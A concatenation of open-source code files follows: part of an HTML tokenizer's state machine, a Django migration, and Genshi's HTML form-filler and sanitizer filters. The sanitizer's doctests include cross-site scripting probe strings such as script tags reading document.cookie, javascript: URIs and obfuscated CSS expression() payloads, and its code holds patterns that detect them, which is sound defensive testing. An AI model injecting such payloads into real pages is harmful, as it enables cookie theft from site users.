self.state = self.bogusCommentState return True def commentStartState(self): data = self.stream.char() if data == "-": self.state = self.commentStartDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "incorrect-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += data self.state = self.commentState return True def commentStartDashState(self): data = self.stream.char() if data == "-": self.state = self.commentEndState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "-\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "incorrect-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "-" + data self.state = self.commentState return True def commentState(self): data = self.stream.char() if data == "-": self.state = self.commentEndDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += data + \ self.stream.charsUntil(("-", "\u0000")) return True def commentEndDashState(self): data = self.stream.char() if data == "-": self.state = self.commentEndState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "-\uFFFD" self.state = self.commentState elif data is EOF: 
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-end-dash"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "-" + data self.state = self.commentState return True def commentEndState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "--\uFFFD" self.state = self.commentState elif data == "!": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-bang-after-double-dash-in-comment"}) self.state = self.commentEndBangState elif data == "-": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-dash-after-double-dash-in-comment"}) self.currentToken["data"] += data elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-double-dash"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: # XXX self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-comment"}) self.currentToken["data"] += "--" + data self.state = self.commentState return True def commentEndBangState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "-": self.currentToken["data"] += "--!" self.state = self.commentEndDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "--!\uFFFD" self.state = self.commentState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-end-bang-state"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "--!" 
+ data self.state = self.commentState return True def doctypeState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-eof"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "need-space-after-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypeNameState return True def beforeDoctypeNameState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-right-bracket"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] = "\uFFFD" self.state = self.doctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-eof"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["name"] = data self.state = self.doctypeNameState return True def doctypeNameState(self): data = self.stream.char() if data in spaceCharacters: self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.state = self.afterDoctypeNameState elif data == ">": self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] += "\uFFFD" self.state = self.doctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype-name"}) self.currentToken["correct"] = False self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["name"] += data return True def afterDoctypeNameState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.currentToken["correct"] = False self.stream.unget(data) self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: if data in ("p", "P"): matched = True for expected in (("u", "U"), ("b", "B"), ("l", "L"), ("i", "I"), ("c", "C")): data = self.stream.char() if data not in expected: matched = False break if matched: self.state = self.afterDoctypePublicKeywordState return True elif data in ("s", "S"): matched = True for expected in (("y", "Y"), ("s", "S"), ("t", "T"), ("e", "E"), ("m", "M")): data = self.stream.char() if data not in expected: matched = False break if matched: self.state = self.afterDoctypeSystemKeywordState return True # All the characters read before the current 'data' will be # [a-zA-Z], so they're garbage in the bogus doctype and can be # discarded; only the latest character might be '>' or EOF # and needs to be ungetted self.stream.unget(data) self.tokenQueue.append({"type": tokenTypes["ParseError"], 
"data": "expected-space-or-right-bracket-in-doctype", "datavars": {"data": data}}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def afterDoctypePublicKeywordState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypePublicIdentifierState elif data in ("'", '"'): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypePublicIdentifierState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.stream.unget(data) self.state = self.beforeDoctypePublicIdentifierState return True def beforeDoctypePublicIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == "\"": self.currentToken["publicId"] = "" self.state = self.doctypePublicIdentifierDoubleQuotedState elif data == "'": self.currentToken["publicId"] = "" self.state = self.doctypePublicIdentifierSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def doctypePublicIdentifierDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterDoctypePublicIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["publicId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["publicId"] += data return True def doctypePublicIdentifierSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterDoctypePublicIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["publicId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["publicId"] += data return True def afterDoctypePublicIdentifierState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.betweenDoctypePublicAndSystemIdentifiersState elif data == ">": 
self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == '"': self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def betweenDoctypePublicAndSystemIdentifiersState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == '"': self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def afterDoctypeSystemKeywordState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypeSystemIdentifierState elif data in ("'", '"'): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypeSystemIdentifierState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.stream.unget(data) self.state = self.beforeDoctypeSystemIdentifierState return True def beforeDoctypeSystemIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == "\"": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def doctypeSystemIdentifierDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterDoctypeSystemIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": 
"invalid-codepoint"}) self.currentToken["systemId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["systemId"] += data return True def doctypeSystemIdentifierSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterDoctypeSystemIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["systemId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["systemId"] += data return True def afterDoctypeSystemIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.state = self.bogusDoctypeState return True def bogusDoctypeState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: # XXX EMIT self.stream.unget(data) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: pass return True def cdataSectionState(self): data = [] while True: data.append(self.stream.charsUntil("]")) data.append(self.stream.charsUntil(">")) char = self.stream.char() if char == EOF: break else: assert char == ">" if data[-1][-2:] == "]]": data[-1] = data[-1][:-2] break else: data.append(char) data = "".join(data) # Deal with null here rather than in the parser nullCount = data.count("\u0000") if nullCount > 0: for i in range(nullCount): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) data = data.replace("\u0000", "\uFFFD") if data: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.dataState return True
mit
ECastleton/Popstop
popsicle/orders/migrations/0007_auto_20170425_2210.py
1
1295
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-26 04:10 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('orders', '0006_auto_20170424_2037'), ] operations = [ migrations.AlterModelOptions( name='flavor', options={'ordering': ['flavor_name']}, ), migrations.AlterModelOptions( name='productcategory', options={'ordering': ['category_name'], 'verbose_name': 'Category', 'verbose_name_plural': 'Categories'}, ), migrations.RemoveField( model_name='productcategory', name='flavors', ), migrations.AddField( model_name='flavor', name='category', field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='orders.ProductCategory'), ), migrations.AlterField( model_name='cateringmenu', name='end_date', field=models.DateField(), ), migrations.AlterField( model_name='cateringmenu', name='start_date', field=models.DateField(), ), ]
gpl-3.0
OpenClovis/SAFplus-Availability-Scalability-Platform
src/ide/genshi/genshi/filters/html.py
22
22797
# -*- coding: utf-8 -*- # # Copyright (C) 2006-2009 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://genshi.edgewall.org/wiki/License. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://genshi.edgewall.org/log/. """Implementation of a number of stream filters.""" try: any except NameError: from genshi.util import any import re from genshi.core import Attrs, QName, stripentities from genshi.core import END, START, TEXT, COMMENT __all__ = ['HTMLFormFiller', 'HTMLSanitizer'] __docformat__ = 'restructuredtext en' class HTMLFormFiller(object): """A stream filter that can populate HTML forms from a dictionary of values. >>> from genshi.input import HTML >>> html = HTML('''<form> ... <p><input type="text" name="foo" /></p> ... </form>''', encoding='utf-8') >>> filler = HTMLFormFiller(data={'foo': 'bar'}) >>> print(html | filler) <form> <p><input type="text" name="foo" value="bar"/></p> </form> """ # TODO: only select the first radio button, and the first select option # (if not in a multiple-select) # TODO: only apply to elements in the XHTML namespace (or no namespace)? def __init__(self, name=None, id=None, data=None, passwords=False): """Create the filter. :param name: The name of the form that should be populated. If this parameter is given, only forms where the ``name`` attribute value matches the parameter are processed. :param id: The ID of the form that should be populated. If this parameter is given, only forms where the ``id`` attribute value matches the parameter are processed. :param data: The dictionary of form values, where the keys are the names of the form fields, and the values are the values to fill in. :param passwords: Whether password input fields should be populated. This is off by default for security reasons (for example, a password may end up in the browser cache) :note: Changed in 0.5.2: added the `passwords` option """ self.name = name self.id = id if data is None: data = {} self.data = data self.passwords = passwords def __call__(self, stream): """Apply the filter to the given stream. 
:param stream: the markup event stream to filter """ in_form = in_select = in_option = in_textarea = False select_value = option_value = textarea_value = None option_start = None option_text = [] no_option_value = False for kind, data, pos in stream: if kind is START: tag, attrs = data tagname = tag.localname if tagname == 'form' and ( self.name and attrs.get('name') == self.name or self.id and attrs.get('id') == self.id or not (self.id or self.name)): in_form = True elif in_form: if tagname == 'input': type = attrs.get('type', '').lower() if type in ('checkbox', 'radio'): name = attrs.get('name') if name and name in self.data: value = self.data[name] declval = attrs.get('value') checked = False if isinstance(value, (list, tuple)): if declval is not None: checked = declval in [unicode(v) for v in value] else: checked = any(value) else: if declval is not None: checked = declval == unicode(value) elif type == 'checkbox': checked = bool(value) if checked: attrs |= [(QName('checked'), 'checked')] elif 'checked' in attrs: attrs -= 'checked' elif type in ('', 'hidden', 'text') \ or type == 'password' and self.passwords: name = attrs.get('name') if name and name in self.data: value = self.data[name] if isinstance(value, (list, tuple)): value = value[0] if value is not None: attrs |= [ (QName('value'), unicode(value)) ] elif tagname == 'select': name = attrs.get('name') if name in self.data: select_value = self.data[name] in_select = True elif tagname == 'textarea': name = attrs.get('name') if name in self.data: textarea_value = self.data.get(name) if isinstance(textarea_value, (list, tuple)): textarea_value = textarea_value[0] in_textarea = True elif in_select and tagname == 'option': option_start = kind, data, pos option_value = attrs.get('value') if option_value is None: no_option_value = True option_value = '' in_option = True continue yield kind, (tag, attrs), pos elif in_form and kind is TEXT: if in_select and in_option: if no_option_value: option_value += data option_text.append((kind, data, pos)) continue elif in_textarea: continue yield kind, data, pos elif in_form and kind is END: tagname = data.localname if tagname == 'form': in_form = False elif tagname == 'select': in_select = False select_value = None elif in_select and tagname == 'option': if isinstance(select_value, (tuple, list)): selected = option_value in [unicode(v) for v in select_value] else: selected = option_value == unicode(select_value) okind, (tag, attrs), opos = option_start if selected: attrs |= [(QName('selected'), 'selected')] elif 'selected' in attrs: attrs -= 'selected' yield okind, (tag, attrs), opos if option_text: for event in option_text: yield event in_option = False no_option_value = False option_start = option_value = None option_text = [] elif in_textarea and tagname == 'textarea': if textarea_value: yield TEXT, unicode(textarea_value), pos textarea_value = None in_textarea = False yield kind, data, pos else: yield kind, data, pos class HTMLSanitizer(object): """A filter that removes potentially dangerous HTML tags and attributes from the stream. >>> from genshi import HTML >>> html = HTML('<div><script>alert(document.cookie)</script></div>', encoding='utf-8') >>> print(html | HTMLSanitizer()) <div/> The default set of safe tags and attributes can be modified when the filter is instantiated. 
For example, to allow inline ``style`` attributes, the following instantation would work: >>> html = HTML('<div style="background: #000"></div>', encoding='utf-8') >>> sanitizer = HTMLSanitizer(safe_attrs=HTMLSanitizer.SAFE_ATTRS | set(['style'])) >>> print(html | sanitizer) <div style="background: #000"/> Note that even in this case, the filter *does* attempt to remove dangerous constructs from style attributes: >>> html = HTML('<div style="background: url(javascript:void); color: #000"></div>', encoding='utf-8') >>> print(html | sanitizer) <div style="color: #000"/> This handles HTML entities, unicode escapes in CSS and Javascript text, as well as a lot of other things. However, the style tag is still excluded by default because it is very hard for such sanitizing to be completely safe, especially considering how much error recovery current web browsers perform. It also does some basic filtering of CSS properties that may be used for typical phishing attacks. For more sophisticated filtering, this class provides a couple of hooks that can be overridden in sub-classes. :warn: Note that this special processing of CSS is currently only applied to style attributes, **not** style elements. """ SAFE_TAGS = frozenset(['a', 'abbr', 'acronym', 'address', 'area', 'b', 'big', 'blockquote', 'br', 'button', 'caption', 'center', 'cite', 'code', 'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt', 'em', 'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map', 'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp', 'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var']) SAFE_ATTRS = frozenset(['abbr', 'accept', 'accept-charset', 'accesskey', 'action', 'align', 'alt', 'axis', 'bgcolor', 'border', 'cellpadding', 'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class', 'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime', 'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height', 'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang', 'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev', 'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size', 'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title', 'type', 'usemap', 'valign', 'value', 'vspace', 'width']) SAFE_CSS = frozenset([ # CSS 3 properties <http://www.w3.org/TR/CSS/#properties> 'background', 'background-attachment', 'background-color', 'background-image', 'background-position', 'background-repeat', 'border', 'border-bottom', 'border-bottom-color', 'border-bottom-style', 'border-bottom-width', 'border-collapse', 'border-color', 'border-left', 'border-left-color', 'border-left-style', 'border-left-width', 'border-right', 'border-right-color', 'border-right-style', 'border-right-width', 'border-spacing', 'border-style', 'border-top', 'border-top-color', 'border-top-style', 'border-top-width', 'border-width', 'bottom', 'caption-side', 'clear', 'clip', 'color', 'content', 'counter-increment', 'counter-reset', 'cursor', 'direction', 'display', 'empty-cells', 'float', 'font', 'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight', 'height', 'left', 'letter-spacing', 'line-height', 'list-style', 'list-style-image', 'list-style-position', 'list-style-type', 'margin', 'margin-bottom', 'margin-left', 
'margin-right', 'margin-top', 'max-height', 'max-width', 'min-height', 'min-width', 'opacity', 'orphans', 'outline', 'outline-color', 'outline-style', 'outline-width', 'overflow', 'padding', 'padding-bottom', 'padding-left', 'padding-right', 'padding-top', 'page-break-after', 'page-break-before', 'page-break-inside', 'quotes', 'right', 'table-layout', 'text-align', 'text-decoration', 'text-indent', 'text-transform', 'top', 'unicode-bidi', 'vertical-align', 'visibility', 'white-space', 'widows', 'width', 'word-spacing', 'z-index', ]) SAFE_SCHEMES = frozenset(['file', 'ftp', 'http', 'https', 'mailto', None]) URI_ATTRS = frozenset(['action', 'background', 'dynsrc', 'href', 'lowsrc', 'src']) def __init__(self, safe_tags=SAFE_TAGS, safe_attrs=SAFE_ATTRS, safe_schemes=SAFE_SCHEMES, uri_attrs=URI_ATTRS, safe_css=SAFE_CSS): """Create the sanitizer. The exact set of allowed elements and attributes can be configured. :param safe_tags: a set of tag names that are considered safe :param safe_attrs: a set of attribute names that are considered safe :param safe_schemes: a set of URI schemes that are considered safe :param uri_attrs: a set of names of attributes that contain URIs """ self.safe_tags = safe_tags # The set of tag names that are considered safe. self.safe_attrs = safe_attrs # The set of attribute names that are considered safe. self.safe_css = safe_css # The set of CSS properties that are considered safe. self.uri_attrs = uri_attrs # The set of names of attributes that may contain URIs. self.safe_schemes = safe_schemes # The set of URI schemes that are considered safe. # IE6 <http://heideri.ch/jso/#80> _EXPRESSION_SEARCH = re.compile(u""" [eE \uFF25 # FULLWIDTH LATIN CAPITAL LETTER E \uFF45 # FULLWIDTH LATIN SMALL LETTER E ] [xX \uFF38 # FULLWIDTH LATIN CAPITAL LETTER X \uFF58 # FULLWIDTH LATIN SMALL LETTER X ] [pP \uFF30 # FULLWIDTH LATIN CAPITAL LETTER P \uFF50 # FULLWIDTH LATIN SMALL LETTER P ] [rR \u0280 # LATIN LETTER SMALL CAPITAL R \uFF32 # FULLWIDTH LATIN CAPITAL LETTER R \uFF52 # FULLWIDTH LATIN SMALL LETTER R ] [eE \uFF25 # FULLWIDTH LATIN CAPITAL LETTER E \uFF45 # FULLWIDTH LATIN SMALL LETTER E ] [sS \uFF33 # FULLWIDTH LATIN CAPITAL LETTER S \uFF53 # FULLWIDTH LATIN SMALL LETTER S ]{2} [iI \u026A # LATIN LETTER SMALL CAPITAL I \uFF29 # FULLWIDTH LATIN CAPITAL LETTER I \uFF49 # FULLWIDTH LATIN SMALL LETTER I ] [oO \uFF2F # FULLWIDTH LATIN CAPITAL LETTER O \uFF4F # FULLWIDTH LATIN SMALL LETTER O ] [nN \u0274 # LATIN LETTER SMALL CAPITAL N \uFF2E # FULLWIDTH LATIN CAPITAL LETTER N \uFF4E # FULLWIDTH LATIN SMALL LETTER N ] """, re.VERBOSE).search # IE6 <http://openmya.hacker.jp/hasegawa/security/expression.txt> # 7) Particular bit of Unicode characters _URL_FINDITER = re.compile( u'[Uu][Rr\u0280][Ll\u029F]\s*\(([^)]+)').finditer def __call__(self, stream): """Apply the filter to the given stream. 
:param stream: the markup event stream to filter """ waiting_for = None for kind, data, pos in stream: if kind is START: if waiting_for: continue tag, attrs = data if not self.is_safe_elem(tag, attrs): waiting_for = tag continue new_attrs = [] for attr, value in attrs: value = stripentities(value) if attr not in self.safe_attrs: continue elif attr in self.uri_attrs: # Don't allow URI schemes such as "javascript:" if not self.is_safe_uri(value): continue elif attr == 'style': # Remove dangerous CSS declarations from inline styles decls = self.sanitize_css(value) if not decls: continue value = '; '.join(decls) new_attrs.append((attr, value)) yield kind, (tag, Attrs(new_attrs)), pos elif kind is END: tag = data if waiting_for: if waiting_for == tag: waiting_for = None else: yield kind, data, pos elif kind is not COMMENT: if not waiting_for: yield kind, data, pos def is_safe_css(self, propname, value): """Determine whether the given css property declaration is to be considered safe for inclusion in the output. :param propname: the CSS property name :param value: the value of the property :return: whether the property value should be considered safe :rtype: bool :since: version 0.6 """ if propname not in self.safe_css: return False if propname.startswith('margin') and '-' in value: # Negative margins can be used for phishing return False return True def is_safe_elem(self, tag, attrs): """Determine whether the given element should be considered safe for inclusion in the output. :param tag: the tag name of the element :type tag: QName :param attrs: the element attributes :type attrs: Attrs :return: whether the element should be considered safe :rtype: bool :since: version 0.6 """ if tag not in self.safe_tags: return False if tag.localname == 'input': input_type = attrs.get('type', '').lower() if input_type == 'password': return False return True def is_safe_uri(self, uri): """Determine whether the given URI is to be considered safe for inclusion in the output. The default implementation checks whether the scheme of the URI is in the set of allowed URIs (`safe_schemes`). >>> sanitizer = HTMLSanitizer() >>> sanitizer.is_safe_uri('http://example.org/') True >>> sanitizer.is_safe_uri('javascript:alert(document.cookie)') False :param uri: the URI to check :return: `True` if the URI can be considered safe, `False` otherwise :rtype: `bool` :since: version 0.4.3 """ if '#' in uri: uri = uri.split('#', 1)[0] # Strip out the fragment identifier if ':' not in uri: return True # This is a relative URI chars = [char for char in uri.split(':', 1)[0] if char.isalnum()] return ''.join(chars).lower() in self.safe_schemes def sanitize_css(self, text): """Remove potentially dangerous property declarations from CSS code. In particular, properties using the CSS ``url()`` function with a scheme that is not considered safe are removed: >>> sanitizer = HTMLSanitizer() >>> sanitizer.sanitize_css(u''' ... background: url(javascript:alert("foo")); ... color: #000; ... ''') [u'color: #000'] Also, the proprietary Internet Explorer function ``expression()`` is always stripped: >>> sanitizer.sanitize_css(u''' ... background: #fff; ... color: #000; ... width: e/**/xpression(alert("foo")); ... 
''') [u'background: #fff', u'color: #000'] :param text: the CSS text; this is expected to be `unicode` and to not contain any character or numeric references :return: a list of declarations that are considered safe :rtype: `list` :since: version 0.4.3 """ decls = [] text = self._strip_css_comments(self._replace_unicode_escapes(text)) for decl in text.split(';'): decl = decl.strip() if not decl: continue try: propname, value = decl.split(':', 1) except ValueError: continue if not self.is_safe_css(propname.strip().lower(), value.strip()): continue is_evil = False if self._EXPRESSION_SEARCH(value): is_evil = True for match in self._URL_FINDITER(value): if not self.is_safe_uri(match.group(1)): is_evil = True break if not is_evil: decls.append(decl.strip()) return decls _NORMALIZE_NEWLINES = re.compile(r'\r\n').sub _UNICODE_ESCAPE = re.compile( r"""\\([0-9a-fA-F]{1,6})\s?|\\([^\r\n\f0-9a-fA-F'"{};:()#*])""", re.UNICODE).sub def _replace_unicode_escapes(self, text): def _repl(match): t = match.group(1) if t: return unichr(int(t, 16)) t = match.group(2) if t == '\\': return r'\\' else: return t return self._UNICODE_ESCAPE(_repl, self._NORMALIZE_NEWLINES('\n', text)) _CSS_COMMENTS = re.compile(r'/\*.*?\*/').sub def _strip_css_comments(self, text): return self._CSS_COMMENTS('', text)
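# ----------------------------------------------------------------------------
# Illustrative usage (a sketch, not part of the original module): pipe a
# user-supplied fragment through the sanitizer, then pre-fill the form.
# The markup and form data below are made up for the example.
if __name__ == '__main__':
    from genshi.input import HTML
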